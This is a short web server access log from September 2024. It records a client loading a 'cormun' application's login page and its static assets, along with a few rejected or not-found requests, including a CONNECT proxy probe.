181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "73±Irí±ÝˆfR5´UÊ/$ê)î§þë»Nd:°0ð l¢ " 400 -
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/gxtimezone.js?85251 HTTP/1.1" 200 5781
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/gxcfg.js?2022112219184450 HTTP/1.1" 200 953
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?1759030 HTTP/1.1" 200 100853
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
181.42.52.215 - - [26/Sep/2024:21:22:11 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
181.42.52.215 - - [26/Sep/2024:21:22:12 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
181.42.52.215 - - [26/Sep/2024:21:22:12 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
154.213.184.25 - - [26/Sep/2024:21:34:25 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
185.180.140.5 - - [26/Sep/2024:21:38:13 -0300] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 1003
